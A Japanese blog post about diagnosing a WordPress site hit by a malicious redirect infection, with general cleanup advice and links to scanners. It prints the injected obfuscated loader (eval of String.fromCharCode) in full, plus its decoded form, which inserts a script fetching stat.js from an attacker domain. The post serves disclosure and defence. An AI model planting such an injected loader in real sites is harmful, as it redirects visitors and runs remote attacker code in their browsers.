ホーム 経験・テクニック共有 標準記事

標準記事

外国貿易向けWordPressサイトがマルウェアに感染し悪意のあるリダイレクトが発生した事例の共有

昨日、グループでWordPressで構築したサイトを開くと自動的に他人のサイトにリダイレクトされるという質問をしているサイト運営者を見かけました。Naibaが彼から教えてもらったURLにアクセスして確認しました。WordPressが悪意のあるリダイレクトコードに感染 自分のサイトを開くと、コンテンツが半分以上読み込まれた後、自動的に第三者のサイトにリダイレクトされ、さらに連続していくつかのサイトにリダイレクトされます…

2021年6月15日更新 約 8 分で読めます
分享一个外贸WordPress网站被挂马恶意跳转的案例

昨日、コミュニティで、あるサイト管理者がWordPressで構築したサイトを開くと自動的に他人のサイトにリダイレクトされるのはどういう状況かと質問しているのを見ました。その後、Naibaは彼が個別チャットで送ったURLにアクセスして確認しました。

WordPressが悪意のあるリダイレクトコードに感染

自分のサイトを開くと、コンテンツが半分以上読み込まれた後、自動的に第三者のサイトにリダイレクトされ、さらに連続していくつかのサイトにリダイレクトされます。

同時に、リダイレクト先のサイトでは通知権限を要求されます。下図の通り:

Chrome通知权限

そして、サイトのソースコードを分析しました(多くのプラグインをインストールしていたため、多数のjsなどのコードがあり、非常に乱雑でした)。

最終的に、以下のコードが異常であることが判明しました。サイト運営者に確認したところ、彼自身のものではなく、インストールしたプラグインのものでもありませんでした。

<script>eval(String.fromCharCode(118, 97, 114, 32, 100, 61, 100, 111, 99, 117, 109, 101, 110, 116, 59, 118, 97, 114, 32, 115, 61, 100, 46, 99, 114, 101, 97, 116, 101, 69, 108, 101, 109, 101, 110, 116, 40, 39, 115, 99, 114, 105, 112, 116, 39, 41, 59, 32, 10, 115, 46, 116, 121, 112, 101, 61, 39, 116, 101, 120, 116, 47, 106, 97, 118, 97, 115, 99, 114, 105, 112, 116, 39, 59, 10, 115, 46, 97, 115, 121, 110, 99, 61, 116, 114, 117, 101, 59, 10, 118, 97, 114, 32, 112, 108, 32, 61, 32, 83, 116, 114, 105, 110, 103, 46, 102, 114, 111, 109, 67, 104, 97, 114, 67, 111, 100, 101, 40, 49, 48, 52, 44, 32, 49, 49, 54, 44, 32, 49, 49, 54, 44, 32, 49, 49, 50, 44, 32, 49, 49, 53, 44, 32, 53, 56, 44, 32, 52, 55, 44, 32, 52, 55, 44, 32, 57, 56, 44, 32, 49, 48, 56, 44, 32, 57, 55, 44, 32, 57, 57, 44, 32, 49, 48, 55, 44, 32, 57, 55, 44, 32, 49, 49, 57, 44, 32, 57, 55, 44, 32, 49, 49, 52, 44, 32, 49, 48, 48, 44, 32, 57, 55, 44, 32, 49, 48, 51, 44, 32, 49, 49, 49, 44, 32, 52, 54, 44, 32, 57, 57, 44, 32, 49, 49, 49, 44, 32, 49, 48, 57, 41, 59, 10, 115, 46, 115, 114, 99, 61, 112, 108, 43, 39, 47, 115, 116, 97, 116, 46, 106, 115, 63, 108, 61, 49, 49, 38, 39, 59, 32, 10, 105, 102, 32, 40, 100, 111, 99, 117, 109, 101, 110, 116, 46, 99, 117, 114, 114, 101, 110, 116, 83, 99, 114, 105, 112, 116, 41, 32, 123, 32, 10, 100, 111, 99, 117, 109, 101, 110, 116, 46, 99, 117, 114, 114, 101, 110, 116, 83, 99, 114, 105, 112, 116, 46, 112, 97, 114, 101, 110, 116, 78, 111, 100, 101, 46, 105, 110, 115, 101, 114, 116, 66, 101, 102, 111, 114, 101, 40, 115, 44, 32, 100, 111, 99, 117, 109, 101, 110, 116, 46, 99, 117, 114, 114, 101, 110, 116, 83, 99, 114, 105, 112, 116, 41, 59, 10, 125, 32, 101, 108, 115, 101, 32, 123, 10, 100, 46, 103, 101, 116, 69, 108, 101, 109, 101, 110, 116, 115, 66, 121, 84, 97, 103, 78, 97, 109, 101, 40, 39, 104, 101, 97, 100, 39, 41, 91, 48, 93, 46, 97, 112, 112, 101, 110, 100, 67, 104, 105, 108, 100, 40, 115, 41, 59, 10, 125));</script>

その後、Naibaはこの「eval(String.fromCharCode」を検索し、以下の記録記事を見つけました。

記録 – サイトがハッキングされました!

その後、jdstiles.comこのサイトで上記のコードの意味を解析しました。

var d=document;var s=d.createElement('script'); 
s.type='text/javascript';
s.async=true;
var pl = String.fromCharCode(104, 116, 116, 112, 115, 58, 47, 47, 98, 108, 97, 99, 107, 97, 119, 97, 114, 100, 97, 103, 111, 46, 99, 111, 109);
s.src=pl+'/stat.js?l=11&'; 
if (document.currentScript) { 
document.currentScript.parentNode.insertBefore(s, document.currentScript);
} else {
d.getElementsByTagName('head')[0].appendChild(s);
}

上記の数字をもう一度解析すると、以下のサイトが現れました。

https://blackawardago.com

最終的に表示されるURLが何であれ、サイトがハッキングされたことは明らかです。

海外ではこれをWordPress悪意のあるリダイレクトコードと呼び、2018年頃から流行し始めたようです。以下は、Naibaが情報を探しているときに見つけた2つの記事です。

https://www.getastra.com/e/malware/infections/wordpress-redirect-hack-js_charcode_voip_ad-malware

https://stackoverflow.com/questions/52282559/how-to-delete-script-injected-on-wordpress-site-ads-voipnewswire-net

もしあなたのサイトもこの悪意のあるリダイレクトコードに感染しているかどうかを知りたい場合は、以下のサイトでチェックできます。

https://sitecheck.sucuri.net/

WordPress悪意リダイレクトコードの削除方法

もちろん、WordPressの悪意リダイレクトコードに感染した場合、どのように削除すればよいでしょうか?(そのサイト管理者が私に処理を依頼しなかったため、Naibaは実際のコードに触れることができませんでした。以下は一般的な対処法の共有です)

コードが理解できる場合の解決方法

  1. 悪意のあるコードを見つけ、削除する。
  2. ウェブサイトのすべてのファイルとコードを調査し、感染しているものや不明なスクリプトがないか確認し、削除する。
  3. データベースが感染していないか確認し、もし感染していたら、感染したコンテンツを削除する。

コードが理解できない場合の解決方法

  1. コードが理解できる人にお金を払ってクリーンアップを依頼する。上記の海外の例では108ドル/年からでした。
  2. ウェブサイトを削除して再インストールし、安全なThemeとPluginを使用していることを確認し、データベースが感染していないことを確認し、サーバーのセキュリティを確保する。

この記事をご覧の専門家で、この種の悪意コードのクリーンアップ方法をご存知の方、または悪意コードのクリーンアップ経験がある方は、ぜひコメントでご教示ください。

最後に、おすすめのPluginを紹介します:WordPressにファイアウォールを導入しましょう!Wordfenceを試してみてください

関連知識:セキュリティ対策を実施し、WordPressサイトのハッキングを防ぐ

1/5 - (1 vote)
前の記事 宝塔パネルでMemcached、ionCubeなどの拡張機能をインストールする方法 同じタイムラインの近くのコンテンツを読み続ける。 次の記事 宝塔パネル管理コマンド 宝塔パネルのパスワードを忘れた場合の解決方法 次の関連チュートリアルや経験を表示する。

AIサイト構築アシスタント

🤖
こんにちは!私はNaibaサイト構築ノートのAIアシスタントです。何かお手伝いできることはありますか?
クイックコンサルティング: